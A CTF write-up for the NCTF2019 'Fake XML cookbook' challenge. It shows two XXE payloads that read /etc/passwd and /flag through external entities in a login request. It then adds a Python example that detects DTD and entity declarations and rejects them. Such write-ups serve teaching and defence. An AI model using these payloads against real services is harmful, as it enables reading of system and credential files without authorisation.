[NCTF2019]Fake XML cookbook
2022-07-13 17:41:00 【Bnessy】

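The challenge name tells us this is an XXE vulnerability. Capturing the request with Burp shows that the request body contains XML.
Try reading a file: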
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/passwd"> ]>
<user><username>&admin;</username><password>admin</password></user>

The flag is usually in the root directory, so modify the payload to read the flag:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]>
<user><username>&admin;</username><password>admin</password></user>
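
Seen from the defending side, as an added example that is not part of the original write-up: a Python login-body parser that reports any DOCTYPE and entity declarations without resolving them and refuses such requests before the fields are used. The names `scan_dtd`, `parse_login` and `RejectedXML` and the sample bodies are assumptions made for illustration; the rejected body reuses the first payload above.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class RejectedXML(ValueError):
    """The request body declared a DTD or was not well-formed."""


def scan_dtd(body: bytes) -> dict:
    """Report DOCTYPE and entity declarations without resolving anything."""
    report = {"doctype": None, "entities": []}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = name

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # system_id is set for SYSTEM entities such as file:///etc/passwd
        report["entities"].append((name, system_id))

    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = on_doctype
    scanner.EntityDeclHandler = on_entity
    try:
        scanner.Parse(body, True)
    except expat.ExpatError as exc:
        raise RejectedXML(f"malformed XML: {exc}") from exc
    return report


def parse_login(body: bytes) -> dict:
    """Return the login fields, refusing any body that carries a DTD."""
    report = scan_dtd(body)
    if report["doctype"] or report["entities"]:
        raise RejectedXML(f"DTD not allowed in login request: {report}")
    root = ET.fromstring(body)
    return {"username": root.findtext("username", ""),
            "password": root.findtext("password", "")}


# Constructed sample bodies: a normal login and the write-up's first payload.
BENIGN = b"<user><username>admin</username><password>admin</password></user>"
PAYLOAD = (b'<?xml version="1.0" encoding="utf-8"?>\n'
           b'<!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/passwd"> ]>\n'
           b"<user><username>&admin;</username><password>admin</password></user>")

if __name__ == "__main__":
    print(parse_login(BENIGN))
    print(scan_dtd(PAYLOAD))
```

The `scan_dtd` report is also usable as a log record: the entity name and its `SYSTEM` identifier are exactly what distinguishes this kind of request from a normal login.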
